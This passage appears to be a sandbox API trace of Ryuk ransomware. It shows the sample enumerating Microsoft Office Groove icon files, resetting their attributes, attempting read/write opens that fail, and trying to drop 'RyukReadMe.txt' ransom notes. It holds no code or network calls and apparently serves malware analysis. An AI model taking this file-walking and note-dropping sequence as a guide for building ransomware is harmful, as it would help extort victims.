(lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gfserrortogroove.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.351] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.351] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.351] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.351] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.351] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO", dwFileAttributes=0x80) returned 0 [0137.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gwe.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.352] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.352] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.352] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.352] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.352] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO", dwFileAttributes=0x80) returned 0 [0137.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INCOMING.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\incoming.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.352] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.352] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.352] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.352] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.353] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO", dwFileAttributes=0x80) returned 0 [0137.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\INDOMAIN.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\indomain.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.353] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.353] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.353] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.353] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.353] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO", dwFileAttributes=0x80) returned 0 [0137.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\mail.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.353] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.353] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.354] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.354] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.354] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO", dwFileAttributes=0x80) returned 0 [0137.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\manual.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.354] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.354] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.354] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.354] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.354] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico", dwFileAttributes=0x80) returned 0 [0137.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxalert.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.354] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.354] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.355] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.355] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.355] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico", dwFileAttributes=0x80) returned 0 [0137.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxerror.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.355] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.355] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.355] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.355] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.355] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxinfo.ico", dwFileAttributes=0x80) returned 0 [0137.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxinfo.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxinfo.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.356] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.356] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.356] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.356] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.356] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ModifiedTelespace.ico", dwFileAttributes=0x80) returned 0 [0137.356] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ModifiedTelespace.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\modifiedtelespace.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.356] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.356] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.356] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.356] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.356] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\OFFLINE.ICO", dwFileAttributes=0x80) returned 0 [0137.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\OFFLINE.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\offline.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.357] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.357] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.357] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.357] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.357] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ONLINE.ICO", dwFileAttributes=0x80) returned 0 [0137.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ONLINE.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\online.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.358] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.358] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.358] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.358] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.358] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\OnLineBusy.ico", dwFileAttributes=0x80) returned 0 [0137.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\OnLineBusy.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\onlinebusy.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.359] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.359] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.359] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.359] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.359] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\OnLineIdle.ico", dwFileAttributes=0x80) returned 0 [0137.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\OnLineIdle.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\onlineidle.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.360] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.360] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.360] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.360] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.360] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\OutDomain.ico", dwFileAttributes=0x80) returned 0 [0137.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\OutDomain.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\outdomain.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.360] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.360] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.360] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.360] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.361] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\OUTGOING.ICO", dwFileAttributes=0x80) returned 0 [0137.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\OUTGOING.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\outgoing.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.361] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.361] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.361] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.361] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.361] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\OutSyncPC.ico", dwFileAttributes=0x80) returned 0 [0137.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\OutSyncPC.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\outsyncpc.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.361] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.361] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.362] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.362] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.362] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\PersonalContact.ico", dwFileAttributes=0x80) returned 0 [0137.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\PersonalContact.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\personalcontact.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.362] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.362] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.362] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.362] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.362] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\SessionMember.ico", dwFileAttributes=0x80) returned 0 [0137.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\SessionMember.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\sessionmember.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.362] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.362] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.363] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.363] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.363] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\SessionOwner.ico", dwFileAttributes=0x80) returned 0 [0137.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\SessionOwner.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\sessionowner.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.363] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.363] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.363] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.363] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.363] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\SpaceSelector.ico", dwFileAttributes=0x80) returned 0 [0137.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\SpaceSelector.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\spaceselector.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.364] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.364] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.364] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.364] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.364] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\StatusAway.ico", dwFileAttributes=0x80) returned 0 [0137.364] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\StatusAway.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\statusaway.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.364] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.364] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.364] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.364] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.365] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\StatusDoNotDisturb.ico", dwFileAttributes=0x80) returned 0 [0137.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\StatusDoNotDisturb.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\statusdonotdisturb.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.365] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.365] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.365] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.365] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.365] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\StatusOnline.ico", dwFileAttributes=0x80) returned 0 [0137.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\StatusOnline.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\statusonline.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.365] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.365] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.366] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.366] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.366] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\TOOLICON.ICO", dwFileAttributes=0x80) returned 0 [0137.366] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\TOOLICON.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\toolicon.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.366] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.366] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.366] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.366] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.366] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\WSS.ICO", dwFileAttributes=0x80) returned 0 [0137.366] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\WSS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\wss.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.366] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.367] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.367] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.367] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.367] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\WSS_DocLib.ico", dwFileAttributes=0x80) returned 0 [0137.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\WSS_DocLib.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\wss_doclib.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.367] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.367] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.367] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0137.367] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.368] SetLastError (dwErrCode=0x0) [0137.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.371] GetLastError () returned 0x5 [0137.371] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.371] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.371] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.371] SetLastError (dwErrCode=0x0) [0137.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.371] GetLastError () returned 0x5 [0137.371] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.371] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.371] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2d00 [0137.372] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.372] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.372] VirtualAlloc 